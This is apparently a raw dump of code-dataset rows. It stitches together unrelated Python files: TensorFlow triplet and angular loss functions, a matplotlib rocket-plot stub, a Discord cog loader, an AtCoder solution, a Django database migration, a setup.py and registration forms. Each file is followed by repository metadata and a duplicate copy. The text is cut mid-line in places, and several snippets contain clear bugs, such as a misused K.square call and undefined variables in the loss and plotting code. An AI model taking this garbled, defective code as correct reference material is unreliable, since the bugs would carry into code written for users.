return contrastive_loss
def lossless_loss_fn(batch_size):
def lossless_loss(y_true, y_pred):
N = tf.constant(4096.0, shape=[1], dtype=tf.float32)
beta = tf.constant(4096.0, shape=[1], dtype=tf.float32)
y_pred = K.clip(y_pred, _EPSILON, 1.0-_EPSILON)
loss = tf.convert_to_tensor(0,dtype=tf.float32)
g = tf.constant(1.0, shape=[1], dtype=tf.float32)
const1 = tf.constant(1.0, shape=[1], dtype=tf.float32)
for i in range(0,batch_size,3):
try:
anchor = y_pred[i+0]
positive = y_pred[i+1]
negative = y_pred[i+2]
pos_dist = K.sum(K.square(anchor-positive),1)
neg_dist = K.sum(K.square(anchor,negative),1)
pos_dist = -tf.log(-tf.divide((pos_dist), beta)+const1+epsilon)
neg_dist = -tf.log(-tf.divide((N-neg_dist), beta)+const1+epsilon)
_loss = neg_dist + pos_dist
loss = (loss + g + _loss)
except:
continue
loss = loss/(batch_size/3)
zero = tf.constant(0.0, shape=[1], dtype=tf.float32)
return tf.maximum(loss,zero)
return lossless_loss
def angular_loss_1_fn(batch_size):
def angular_loss_1(y_true, y_pred):
y_pred = K.clip(y_pred, _EPSILON, 1.0-_EPSILON)
loss = tf.convert_to_tensor(0,dtype=tf.float32)
g = tf.constant(1.0, shape=[1], dtype=tf.float32)
c = tf.constant(4.0, shape=[1], dtype=tf.float32)
alpha = tf.constant(45.0, shape=[1], dtype=tf.float32)
for i in range(0,batch_size,3):
try:
xa = y_pred[i+0]
xp = y_pred[i+1]
xn = y_pred[i+2]
sq = K.square(xa-xp)
xc = (xa+xp)/2
_loss = sq - c*(tf.tan(alpha*K.square(xn-xc))**2)
zero = tf.constant(0.0, shape=[1], dtype=tf.float32)
_loss = tf.maximum(_loss,zero)
loss = (loss + g + _loss)
except:
continue
loss = loss/(batch_size/3)
return loss
return angular_loss_1
def angular_loss_2_fn(batch_size):
def angular_loss_2(y_true, y_pred):
y_pred = K.clip(y_pred, _EPSILON, 1.0-_EPSILON)
loss = tf.convert_to_tensor(0,dtype=tf.float32)
g = tf.constant(1.0, shape=[1], dtype=tf.float32)
c = tf.constant(4.0, shape=[1], dtype=tf.float32)
d = tf.constant(2.0, shape=[1], dtype=tf.float32)
alpha = tf.constant(45.0, shape=[1], dtype=tf.float32)
losses = []
losses2 = []
for i in range(0,batch_size,3):
try:
xa = y_pred[i+0]
xp = y_pred[i+1]
xn = y_pred[i+2]
fapn = c*(tf.tan(alpha*K.transpose(xa+xp)*xn)**2) - d*(g+tf.tan(alpha)**2)*K.transpose(xa)*xp
losses.append(fapn)
losses2.append(K.transpose(xa)*xn - K.transpose(xa)*xp)
loss = (loss + g + _loss)
except:
continue
loss = K.sum(K.log(1+2*K.sum([K.exp(v) for v in losses])))
loss2 = K.sum(K.log(1+2*K.sum([K.exp(v) for v in losses2])))
loss = loss + 2*loss2
loss = loss/(batch_size/3)
zero = tf.constant(0.0, shape=[1], dtype=tf.float32)
return tf.maximum(loss,zero)
return angular_loss_2 | true | true |
1c3314cfa907a66f629e785eaa51462cbe241442 | 1,072 | py | Python | src/base.py | DrFargo/Starship-Simulation | ff1c30cd8227c7041357a1e2da2fcb34ab06a757 | [
"MIT"
] | null | null | null | src/base.py | DrFargo/Starship-Simulation | ff1c30cd8227c7041357a1e2da2fcb34ab06a757 | [
"MIT"
] | null | null | null | src/base.py | DrFargo/Starship-Simulation | ff1c30cd8227c7041357a1e2da2fcb34ab06a757 | [
"MIT"
] | null | null | null | ## Author DrFargo
## Created: 2021-02-07
## Latest update: 2021-02-12
import matplotlib
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import scipy.linalg as la
import matplotlib.pyplot as plt
class starshipSimulation:
    """Bare-bones 3D launch visualisation scaffold (work in progress)."""

    def parameters(self, g, lox, engines):
        """Record simulation constants on the instance.

        Bug fix: the original assigned plain locals, so every value was
        discarded as soon as the method returned.
        """
        self.gravity = g
        self.tlox = lox                   # liquid-oxygen quantity -- units TBD
        self.rapteng = engines * 2.3      # per-engine factor 2.3 -- TODO confirm units
        self.m_fuel = 1.8
        self.m_ox = 2.2

    #def DragForce(self, v):

    def Render(self, filename):
        """Draw the labelled 3D scene and save it as ``<filename>.png``."""
        fig = plt.figure()
        ax = fig.gca(projection='3d')
        ax = self.XYZLabels(ax, 12000)
        plt.savefig(filename + ".png")
        plt.show()

    def explode(self, t):
        # NOTE(review): `ax` and `y` are undefined in this scope -- the method
        # cannot run as written; it needs the axes (and a state vector) passed
        # in or stored on self. Left as-is pending a design decision.
        ax.text(0, 0, 0, "red", color='red')
        return y[1]

    def XYZLabels(self, ax, Limit):
        """Apply symmetric axis limits and labels around the peak altitude.

        Bug fix: the original returned None, so Render's
        ``ax = self.XYZLabels(ax, 12000)`` clobbered its axes handle;
        return the configured axes instead.
        """
        TopAlt = np.max(Limit)
        Lim = TopAlt * 1.1
        ax.set_zlim3d([0, 2 * Lim])
        ax.set_xlim3d([-Lim, Lim])
        ax.set_ylim3d([-Lim, Lim])
        ax.set_xlabel("Eastings")
        ax.set_ylabel("Northings")
        ax.set_zlabel("Altitude")
        return ax
ax.set_zlabel("Altitude") | 26.146341 | 45 | 0.545709 | port numpy as np
import scipy.linalg as la
import matplotlib.pyplot as plt
class starshipSimulation:
def parameters(self, g, lox, engines):
gravity = g
tlox = lox
rapteng = engines*2.3
m_fuel = 1.8
m_ox = 2.2
def Render(self, filename):
fig = plt.figure()
ax = fig.gca(projection='3d')
ax = self.XYZLabels(ax, 12000)
plt.savefig(filename + ".png")
plt.show()
def explode(self,t):
ax.text(0, 0, 0, "red", color='red')
return y[1]
def XYZLabels(self, ax, Limit):
TopAlt = np.max(Limit)
Lim = TopAlt*1.1
ax.set_zlim3d([0,2*Lim])
ax.set_xlim3d([-Lim,Lim])
ax.set_ylim3d([-Lim,Lim])
ax.set_xlabel("Eastings")
ax.set_ylabel("Northings")
ax.set_zlabel("Altitude") | true | true |
1c331613d3b8ca181851d6b069742635a6769333 | 1,134 | py | Python | bot/cogs/Cogs/__init__.py | abindent/Utility-Bot | a11b790e7930a035fdca2b153950e624e3abafe4 | [
"MIT"
] | 2 | 2022-03-20T13:12:35.000Z | 2022-03-27T08:52:37.000Z | bot/cogs/Cogs/__init__.py | abindent/Nextcord-Utility-Bot | a11b790e7930a035fdca2b153950e624e3abafe4 | [
"MIT"
] | 2 | 2022-03-07T01:10:21.000Z | 2022-03-08T07:33:06.000Z | bot/cogs/Cogs/__init__.py | abindent/Utility-Bot | a11b790e7930a035fdca2b153950e624e3abafe4 | [
"MIT"
] | 1 | 2022-03-08T07:41:46.000Z | 2022-03-08T07:41:46.000Z | import nextcord
from nextcord.ext import commands
class CogSetup(commands.Cog, name="Extension Setup", description="Load, Unload or Reload the extensions."):
    """Owner-only commands for hot-(un)loading the bot's extension cogs."""

    COG_EMOJI = "⚙️"

    def __init__(self, bot):
        self.bot = bot

    @commands.command(name="load", description="Load the cogs.", usage="<cog_name or extension_name>")
    @commands.is_owner()
    async def load(self, ctx, extensions):
        """Load ``cogs.<extensions>`` into the running bot."""
        self.bot.load_extension(f"cogs.{extensions}")
        await ctx.send("Loaded Cogs")

    @commands.command(name="unload", description="Unload the cogs.", usage="<cog_name or extension_name>")
    @commands.is_owner()
    async def unload(self, ctx, extensions):
        """Unload ``cogs.<extensions>`` from the running bot."""
        self.bot.unload_extension(f"cogs.{extensions}")
        await ctx.send("Unloaded Cogs")

    @commands.command(name="reload", description="Reload the cogs.", usage="<cog_name or extension_name>")
    @commands.is_owner()
    async def reload(self, ctx, extensions):
        """Reload ``cogs.<extensions>`` in place (unload + load)."""
        self.bot.reload_extension(f"cogs.{extensions}")
        await ctx.send("Reloaded Cogs")
| 34.363636 | 107 | 0.663139 | import nextcord
from nextcord.ext import commands
class CogSetup(commands.Cog, name="Extension Setup", description="Load, Unload or Reload the extensions."):
    """Owner-only commands for hot-(un)loading extensions from the `cogs` package."""
    def __init__(self, bot):
        self.bot = bot
    # Emoji shown next to this cog in the bot's help listing.
    COG_EMOJI = "⚙️"
    @commands.command(name="load", description="Load the cogs.", usage="<cog_name or extension_name>")
    @commands.is_owner()
    async def load(self, ctx, extensions):
        """Load `cogs.<extensions>` into the running bot (bot owner only)."""
        self.bot.load_extension(f"cogs.{extensions}")
        await ctx.send("Loaded Cogs")
    @commands.command(name="unload", description="Unload the cogs.", usage="<cog_name or extension_name>")
    @commands.is_owner()
    async def unload(self, ctx, extensions):
        """Unload `cogs.<extensions>` from the running bot (bot owner only)."""
        self.bot.unload_extension(f"cogs.{extensions}")
        await ctx.send("Unloaded Cogs")
    @commands.command(name="reload", description="Reload the cogs.", usage="<cog_name or extension_name>")
    @commands.is_owner()
    async def reload(self, ctx, extensions):
        """Atomically reload `cogs.<extensions>` to pick up code changes (bot owner only)."""
        self.bot.reload_extension(f"cogs.{extensions}")
        await ctx.send("Reloaded Cogs")
| true | true |
1c331618c8fa5a71c5b4d40f6f354c23efb05154 | 601 | py | Python | AtCoder/ABC045/D.py | takaaki82/Java-Lessons | c4f11462bf84c091527dde5f25068498bfb2cc49 | [
"MIT"
] | 1 | 2018-11-25T04:15:45.000Z | 2018-11-25T04:15:45.000Z | AtCoder/ABC045/D.py | takaaki82/Java-Lessons | c4f11462bf84c091527dde5f25068498bfb2cc49 | [
"MIT"
] | null | null | null | AtCoder/ABC045/D.py | takaaki82/Java-Lessons | c4f11462bf84c091527dde5f25068498bfb2cc49 | [
"MIT"
] | 2 | 2018-08-08T13:01:14.000Z | 2018-11-25T12:38:36.000Z | H, W, N = map(int, input().split())
# ABC045 D "Snuke's Coloring": H, W, N were read on the previous line.
# For every 3x3 window of the H x W grid, count how many of the N painted
# cells it contains, then print, for j = 0..9, how many windows contain
# exactly j painted cells.
from collections import defaultdict

# 0-based coordinates of the painted cells.
ab = []
for _ in range(N):
    a, b = map(int, input().split())
    ab.append((a - 1, b - 1))
# comb_map maps a window's top-left corner to its painted-cell count; only
# windows containing at least one painted cell ever get an entry.
# (defaultdict replaces the original `if key in dict.keys()` bookkeeping.)
comb_map = defaultdict(int)
for a, b in ab:
    # Each painted cell lies in up to 9 windows with corners (a-k, b-m).
    for k in range(3):
        for m in range(3):
            if 0 <= a - k < H - 2 and 0 <= b - m < W - 2:
                comb_map[(a - k, b - m)] += 1
# count[j] = number of windows with exactly j painted cells (0 <= j <= 9).
count = [0] * 10
for v in comb_map.values():
    count[v] += 1
# Windows absent from comb_map contain zero painted cells.
count[0] = (H - 2) * (W - 2) - sum(count[1:])
for c in count:
    print(c)
| 22.259259 | 57 | 0.417637 | H, W, N = map(int, input().split())
# ABC045 D "Snuke's Coloring": H, W, N were read on the previous line.
# For every 3x3 window of the H x W grid, count how many of the N painted
# cells it contains, then print, for j = 0..9, how many windows contain
# exactly j painted cells.
ab = []
for i in range(N):
    a, b = map(int, input().split())
    ab.append((a - 1, b - 1))  # convert to 0-based coordinates
comb_map = {}
# Each painted cell (a, b) lies in up to 9 windows, whose top-left corners
# are (a-k, b-m) for k, m in 0..2; bump the per-window counter for each.
for a, b in ab:
    for k in range(3):
        for m in range(3):
            if 0 <= a - k < H - 2 and 0 <= b - m < W - 2:
                if (a - k, b - m) in comb_map.keys():
                    comb_map[(a - k, b - m)] += 1
                else:
                    comb_map[(a - k, b - m)] = 1
# count[j] = number of windows with exactly j painted cells (0 <= j <= 9).
count = [0 for _ in range(10)]
for v in comb_map.values():
    count[v] += 1
# Windows never touched by a painted cell contain zero of them.
count[0] = (H - 2) * (W - 2) - sum(count[1:])
for c in count:
    print(c)
| true | true |
1c331652aac3fe02dca4d80a87a46912b21c30c3 | 5,214 | py | Python | installation/migrations/dbschema.files-and-directories.py | fekblom/critic | a6b60c9053e13d4c878d50531860d7389568626d | [
"Apache-2.0"
] | 216 | 2015-01-05T12:48:10.000Z | 2022-03-08T00:12:23.000Z | installation/migrations/dbschema.files-and-directories.py | fekblom/critic | a6b60c9053e13d4c878d50531860d7389568626d | [
"Apache-2.0"
] | 55 | 2015-02-28T12:10:26.000Z | 2020-11-18T17:45:16.000Z | installation/migrations/dbschema.files-and-directories.py | fekblom/critic | a6b60c9053e13d4c878d50531860d7389568626d | [
"Apache-2.0"
] | 34 | 2015-05-02T15:15:10.000Z | 2020-06-15T19:20:37.000Z | # -*- mode: python; encoding: utf-8 -*-
#
# Copyright 2013 Jens Lindström, Opera Software ASA
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
import sys
import psycopg2
import json
import argparse
import os
parser = argparse.ArgumentParser()
parser.add_argument("--uid", type=int)
parser.add_argument("--gid", type=int)
arguments = parser.parse_args()
# Drop privileges to the requested user/group.  The group must be changed
# first: after setuid() the process would no longer be allowed to setgid().
os.setgid(arguments.gid)
os.setuid(arguments.uid)
# Consume the JSON payload piped on stdin (currently unused by this script).
data = json.load(sys.stdin)
# NOTE(review): imported here rather than at the top, presumably so module
# lookup happens after the privilege drop — confirm before moving it.
import configuration
db = psycopg2.connect(**configuration.database.PARAMETERS)
cursor = db.cursor()
def column_exists(table, column):
    """Return True if `table` has a column named `column` (probed via a cheap SELECT)."""
    probe = "SELECT %s FROM %s LIMIT 1" % (column, table)
    try:
        cursor.execute(probe)
    except psycopg2.ProgrammingError:
        # The failed statement aborts the transaction; roll back so that
        # subsequent queries on the shared connection still work.
        db.rollback()
        return False
    return True
added = [column_exists("files", "path"),
column_exists("filters", "path"),
column_exists("reviewfilters", "path")]
removed = [column_exists("files", "directory"),
column_exists("files", "name"),
column_exists("filters", "directory"),
column_exists("filters", "file"),
column_exists("reviewfilters", "directory"),
column_exists("reviewfilters", "file"),
column_exists("directories", "id")]
if all(added) and not any(removed):
# All expected modifications appear to have taken place already.
sys.exit(0)
elif any(added) or not all(removed):
# Some modifications appear to have taken place already, but not
# all. This is bad, and possibly unrecoverable. It's probably
# not a good idea to just run the commands below.
sys.stderr.write("""\
The database schema appears to be in an inconsistent state!
Please see installation/migrations/dbschema.files-and-directories.py
and try to figure out which of the commands in it to run.
Alternatively, restore a database backup from before the previous
upgrade attempt, and then try running upgrade.py again.
""")
sys.exit(1)
# Add 'path' column to 'files' table.
cursor.execute("ALTER TABLE files ADD path TEXT")
cursor.execute("UPDATE files SET path=fullfilename(id)")
cursor.execute("ALTER TABLE files ALTER path SET NOT NULL")
cursor.execute("CREATE UNIQUE INDEX files_path_md5 ON files (MD5(path))")
cursor.execute("CREATE INDEX files_path_gin ON files USING gin (STRING_TO_ARRAY(path, '/'))")
# Modify 'filters' table similarly.
cursor.execute("ALTER TABLE filters ADD path TEXT")
cursor.execute("UPDATE filters SET path=fullfilename(file) WHERE file>0")
cursor.execute("UPDATE filters SET path=COALESCE(NULLIF(fulldirectoryname(directory), ''), '/') WHERE file=0")
cursor.execute("ALTER TABLE filters ALTER path SET NOT NULL")
cursor.execute("CREATE UNIQUE INDEX filters_repository_uid_path_md5 ON filters (repository, uid, MD5(path))")
# Modify 'reviewfilters' table similarly.
cursor.execute("ALTER TABLE reviewfilters ADD path TEXT")
cursor.execute("UPDATE reviewfilters SET path=fullfilename(file) WHERE file>0")
cursor.execute("UPDATE reviewfilters SET path=COALESCE(NULLIF(fulldirectoryname(directory), ''), '/') WHERE file=0")
cursor.execute("ALTER TABLE reviewfilters ALTER path SET NOT NULL")
cursor.execute("CREATE UNIQUE INDEX reviewfilters_review_uid_path_md5 ON reviewfilters (review, uid, MD5(path))")
# Modify 'reviewfilterchanges' table similarly.
cursor.execute("ALTER TABLE reviewfilterchanges ADD path TEXT")
cursor.execute("UPDATE reviewfilterchanges SET path=fullfilename(file) WHERE file>0")
cursor.execute("UPDATE reviewfilterchanges SET path=fulldirectoryname(directory) WHERE file=0")
cursor.execute("ALTER TABLE reviewfilterchanges ALTER path SET NOT NULL")
# Drop the now redundant 'directories' table.
cursor.execute("ALTER TABLE files DROP directory, DROP name")
cursor.execute("ALTER TABLE filters DROP directory, DROP file, DROP specificity")
cursor.execute("ALTER TABLE reviewfilters DROP directory, DROP file")
cursor.execute("ALTER TABLE reviewfilterchanges DROP directory, DROP file")
cursor.execute("DROP TABLE directories")
# Drop various utility functions that are no longer necessary.
cursor.execute("DROP FUNCTION IF EXISTS filepath()")
cursor.execute("DROP FUNCTION IF EXISTS directorypath()")
cursor.execute("DROP FUNCTION IF EXISTS subdirectories()")
cursor.execute("DROP FUNCTION IF EXISTS containedfiles()")
cursor.execute("DROP FUNCTION IF EXISTS fullfilename()")
cursor.execute("DROP FUNCTION IF EXISTS fulldirectoryname()")
cursor.execute("DROP FUNCTION IF EXISTS findfile()")
cursor.execute("DROP FUNCTION IF EXISTS finddirectory()")
db.commit()
# ALTER TYPE ... ADD VALUE cannot be executed inside a transaction block.
db.autocommit = True
# Add filter type "ignored".
cursor.execute("ALTER TYPE filtertype ADD VALUE 'ignored'")
db.close()
| 40.418605 | 116 | 0.75163 |
import sys
import psycopg2
import json
import argparse
import os
parser = argparse.ArgumentParser()
parser.add_argument("--uid", type=int)
parser.add_argument("--gid", type=int)
arguments = parser.parse_args()
os.setgid(arguments.gid)
os.setuid(arguments.uid)
data = json.load(sys.stdin)
import configuration
db = psycopg2.connect(**configuration.database.PARAMETERS)
cursor = db.cursor()
def column_exists(table, column):
    """Return True if `table` has a column named `column` (probed via a cheap SELECT)."""
    try:
        cursor.execute("SELECT %s FROM %s LIMIT 1" % (column, table))
        return True
    except psycopg2.ProgrammingError:
        # The failed statement aborts the transaction; roll back so that
        # subsequent queries on the shared connection still work.
        db.rollback()
        return False
added = [column_exists("files", "path"),
column_exists("filters", "path"),
column_exists("reviewfilters", "path")]
removed = [column_exists("files", "directory"),
column_exists("files", "name"),
column_exists("filters", "directory"),
column_exists("filters", "file"),
column_exists("reviewfilters", "directory"),
column_exists("reviewfilters", "file"),
column_exists("directories", "id")]
if all(added) and not any(removed):
sys.exit(0)
elif any(added) or not all(removed):
# not a good idea to just run the commands below.
sys.stderr.write("""\
The database schema appears to be in an inconsistent state!
Please see installation/migrations/dbschema.files-and-directories.py
and try to figure out which of the commands in it to run.
Alternatively, restore a database backup from before the previous
upgrade attempt, and then try running upgrade.py again.
""")
sys.exit(1)
# Add 'path' column to 'files' table.
cursor.execute("ALTER TABLE files ADD path TEXT")
cursor.execute("UPDATE files SET path=fullfilename(id)")
cursor.execute("ALTER TABLE files ALTER path SET NOT NULL")
cursor.execute("CREATE UNIQUE INDEX files_path_md5 ON files (MD5(path))")
cursor.execute("CREATE INDEX files_path_gin ON files USING gin (STRING_TO_ARRAY(path, '/'))")
# Modify 'filters' table similarly.
cursor.execute("ALTER TABLE filters ADD path TEXT")
cursor.execute("UPDATE filters SET path=fullfilename(file) WHERE file>0")
cursor.execute("UPDATE filters SET path=COALESCE(NULLIF(fulldirectoryname(directory), ''), '/') WHERE file=0")
cursor.execute("ALTER TABLE filters ALTER path SET NOT NULL")
cursor.execute("CREATE UNIQUE INDEX filters_repository_uid_path_md5 ON filters (repository, uid, MD5(path))")
# Modify 'reviewfilters' table similarly.
cursor.execute("ALTER TABLE reviewfilters ADD path TEXT")
cursor.execute("UPDATE reviewfilters SET path=fullfilename(file) WHERE file>0")
cursor.execute("UPDATE reviewfilters SET path=COALESCE(NULLIF(fulldirectoryname(directory), ''), '/') WHERE file=0")
cursor.execute("ALTER TABLE reviewfilters ALTER path SET NOT NULL")
cursor.execute("CREATE UNIQUE INDEX reviewfilters_review_uid_path_md5 ON reviewfilters (review, uid, MD5(path))")
# Modify 'reviewfilterchanges' table similarly.
cursor.execute("ALTER TABLE reviewfilterchanges ADD path TEXT")
cursor.execute("UPDATE reviewfilterchanges SET path=fullfilename(file) WHERE file>0")
cursor.execute("UPDATE reviewfilterchanges SET path=fulldirectoryname(directory) WHERE file=0")
cursor.execute("ALTER TABLE reviewfilterchanges ALTER path SET NOT NULL")
# Drop the now redundant 'directories' table.
cursor.execute("ALTER TABLE files DROP directory, DROP name")
cursor.execute("ALTER TABLE filters DROP directory, DROP file, DROP specificity")
cursor.execute("ALTER TABLE reviewfilters DROP directory, DROP file")
cursor.execute("ALTER TABLE reviewfilterchanges DROP directory, DROP file")
cursor.execute("DROP TABLE directories")
# Drop various utility functions that are no longer necessary.
cursor.execute("DROP FUNCTION IF EXISTS filepath()")
cursor.execute("DROP FUNCTION IF EXISTS directorypath()")
cursor.execute("DROP FUNCTION IF EXISTS subdirectories()")
cursor.execute("DROP FUNCTION IF EXISTS containedfiles()")
cursor.execute("DROP FUNCTION IF EXISTS fullfilename()")
cursor.execute("DROP FUNCTION IF EXISTS fulldirectoryname()")
cursor.execute("DROP FUNCTION IF EXISTS findfile()")
cursor.execute("DROP FUNCTION IF EXISTS finddirectory()")
db.commit()
# ALTER TYPE ... ADD VALUE cannot be executed inside a transaction block.
db.autocommit = True
# Add filter type "ignored".
cursor.execute("ALTER TYPE filtertype ADD VALUE 'ignored'")
db.close()
| true | true |
1c3316737fce0dbb30450130ad8d0edd48534733 | 1,194 | py | Python | setup.py | bentetamas/tinycards-python-api | 98c35c8b1fbad28fcc61c01cbdae7e092e779a62 | [
"MIT"
] | null | null | null | setup.py | bentetamas/tinycards-python-api | 98c35c8b1fbad28fcc61c01cbdae7e092e779a62 | [
"MIT"
] | null | null | null | setup.py | bentetamas/tinycards-python-api | 98c35c8b1fbad28fcc61c01cbdae7e092e779a62 | [
"MIT"
] | null | null | null | from setuptools import setup, find_packages
NAME = 'tinycards'
setup(
name=NAME,
version='0.281',
description="An unofficial Python API for Tinycards by Duolingo",
url='https://github.com/floscha/tinycards-python-api',
author='Florian Schäfer',
author_email='florian.joh.schaefer@gmail.com',
license='MIT',
packages=find_packages(),
install_requires=[
'requests==2.21.0',
'requests-toolbelt==0.9.1',
'retrying==1.3.3',
'typer==0.0.8'
],
zip_safe=False,
entry_points={
'console_scripts': [
'tinycards = tinycards.client.cli:app',
]
},
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3 :: Only',
'Topic :: Software Development'
]
)
| 29.85 | 69 | 0.586265 | from setuptools import setup, find_packages
NAME = 'tinycards'
setup(
name=NAME,
version='0.281',
description="An unofficial Python API for Tinycards by Duolingo",
url='https://github.com/floscha/tinycards-python-api',
author='Florian Schäfer',
author_email='florian.joh.schaefer@gmail.com',
license='MIT',
packages=find_packages(),
install_requires=[
'requests==2.21.0',
'requests-toolbelt==0.9.1',
'retrying==1.3.3',
'typer==0.0.8'
],
zip_safe=False,
entry_points={
'console_scripts': [
'tinycards = tinycards.client.cli:app',
]
},
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3 :: Only',
'Topic :: Software Development'
]
)
| true | true |
1c3318416dc8b7805443ceeac11a29cef738ae32 | 1,225 | py | Python | NesaraTours/migrations/0002_auto_20200831_0946.py | Annonymus-Coder/Tours-And-Travels-project | 81fce5c24599895b6526eeb28bd4582b5d55948b | [
"MIT"
] | null | null | null | NesaraTours/migrations/0002_auto_20200831_0946.py | Annonymus-Coder/Tours-And-Travels-project | 81fce5c24599895b6526eeb28bd4582b5d55948b | [
"MIT"
] | null | null | null | NesaraTours/migrations/0002_auto_20200831_0946.py | Annonymus-Coder/Tours-And-Travels-project | 81fce5c24599895b6526eeb28bd4582b5d55948b | [
"MIT"
] | null | null | null | # Generated by Django 3.1 on 2020-08-31 04:16
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('auth', '0012_alter_user_first_name_max_length'),
('NesaraTours', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='employee',
name='role',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='auth.group'),
),
migrations.AddField(
model_name='employee',
name='user',
field=models.OneToOneField(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='tour',
name='Employee',
field=models.ManyToManyField(to='NesaraTours.Employee'),
),
migrations.AlterField(
model_name='tour',
name='Client',
field=models.ManyToManyField(to='NesaraTours.Client'),
),
]
| 32.236842 | 125 | 0.601633 |
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('auth', '0012_alter_user_first_name_max_length'),
('NesaraTours', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='employee',
name='role',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='auth.group'),
),
migrations.AddField(
model_name='employee',
name='user',
field=models.OneToOneField(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='tour',
name='Employee',
field=models.ManyToManyField(to='NesaraTours.Employee'),
),
migrations.AlterField(
model_name='tour',
name='Client',
field=models.ManyToManyField(to='NesaraTours.Client'),
),
]
| true | true |
1c3318ca5161384c5534f50a78303c641566d024 | 324 | py | Python | redcmd/client/__main__.py | amol9/redcmd | 34086eb42ec6acc16dbd2b3ea530898a6a287639 | [
"MIT"
] | 1 | 2015-10-26T19:38:28.000Z | 2015-10-26T19:38:28.000Z | redcmd/client/__main__.py | amol9/redcmd | 34086eb42ec6acc16dbd2b3ea530898a6a287639 | [
"MIT"
] | null | null | null | redcmd/client/__main__.py | amol9/redcmd | 34086eb42ec6acc16dbd2b3ea530898a6a287639 | [
"MIT"
] | null | null | null |
from .. import CommandLine, CommandLineError, Subcommand, subcmd
from ..version import __version__
from .autocomp_subcommand import *
from .init_subcommand import *
cmdline = CommandLine(prog='redcmd', description='redcmd client.',
version=__version__)
try:
cmdline.execute()
except CommandLineError as e:
print(e)
| 20.25 | 66 | 0.777778 |
from .. import CommandLine, CommandLineError, Subcommand, subcmd
from ..version import __version__
from .autocomp_subcommand import *
from .init_subcommand import *
cmdline = CommandLine(prog='redcmd', description='redcmd client.',
version=__version__)
try:
cmdline.execute()
except CommandLineError as e:
print(e)
| true | true |
1c33198acec018137f92a47269f0ef6f6b75370d | 1,323 | py | Python | accounts/forms.py | Paul-Cheeseman/Stream3-Project | 174fa1d6bbf9ed75748513af366629ed01dddfee | [
"BSD-3-Clause"
] | null | null | null | accounts/forms.py | Paul-Cheeseman/Stream3-Project | 174fa1d6bbf9ed75748513af366629ed01dddfee | [
"BSD-3-Clause"
] | 8 | 2020-02-12T00:52:56.000Z | 2022-03-11T23:23:20.000Z | accounts/forms.py | Paul-Cheeseman/Stream3-Project | 174fa1d6bbf9ed75748513af366629ed01dddfee | [
"BSD-3-Clause"
] | 1 | 2018-02-22T11:15:48.000Z | 2018-02-22T11:15:48.000Z | from django import forms
from django.contrib.auth.forms import UserCreationForm
from accounts.models import User
#User Registration form - based on code from Code Institute
class UserRegistrationForm(UserCreationForm):
password1 = forms.CharField(
label='Password',
widget=forms.PasswordInput
)
password2 = forms.CharField(
label='Password Confirmation',
widget=forms.PasswordInput
)
class Meta:
model = User
fields = ['email', 'password1', 'password2']
exclude = ['username']
def clean_password2(self):
password1 = self.cleaned_data.get('password1')
password2 = self.cleaned_data.get('password2')
if password1 and password2 and password1 != password2:
message = "Passwords do not match"
raise forms.ValidationError(message)
return password2
def save(self, commit=True):
instance = super(UserRegistrationForm, self).save(commit=False)
# automatically set to email address to create a unique identifier
instance.username = instance.email
if commit:
instance.save()
return instance
class UserLoginForm(forms.Form):
email = forms.EmailField()
password = forms.CharField(widget=forms.PasswordInput)
| 25.941176 | 74 | 0.662887 | from django import forms
from django.contrib.auth.forms import UserCreationForm
from accounts.models import User
class UserRegistrationForm(UserCreationForm):
password1 = forms.CharField(
label='Password',
widget=forms.PasswordInput
)
password2 = forms.CharField(
label='Password Confirmation',
widget=forms.PasswordInput
)
class Meta:
model = User
fields = ['email', 'password1', 'password2']
exclude = ['username']
def clean_password2(self):
password1 = self.cleaned_data.get('password1')
password2 = self.cleaned_data.get('password2')
if password1 and password2 and password1 != password2:
message = "Passwords do not match"
raise forms.ValidationError(message)
return password2
def save(self, commit=True):
instance = super(UserRegistrationForm, self).save(commit=False)
instance.username = instance.email
if commit:
instance.save()
return instance
class UserLoginForm(forms.Form):
email = forms.EmailField()
password = forms.CharField(widget=forms.PasswordInput)
| true | true |
1c3319ce9f23f6f47aafb85e691db243fef0398c | 1,738 | py | Python | Gathered CTF writeups/ptr-yudai-writeups/2019/InCTF_2019/schmaltz/solve.py | mihaid-b/CyberSakura | f60e6b6bfd6898c69b84424b080090ae98f8076c | [
"MIT"
] | 1 | 2022-03-27T06:00:41.000Z | 2022-03-27T06:00:41.000Z | Gathered CTF writeups/ptr-yudai-writeups/2019/InCTF_2019/schmaltz/solve.py | mihaid-b/CyberSakura | f60e6b6bfd6898c69b84424b080090ae98f8076c | [
"MIT"
] | null | null | null | Gathered CTF writeups/ptr-yudai-writeups/2019/InCTF_2019/schmaltz/solve.py | mihaid-b/CyberSakura | f60e6b6bfd6898c69b84424b080090ae98f8076c | [
"MIT"
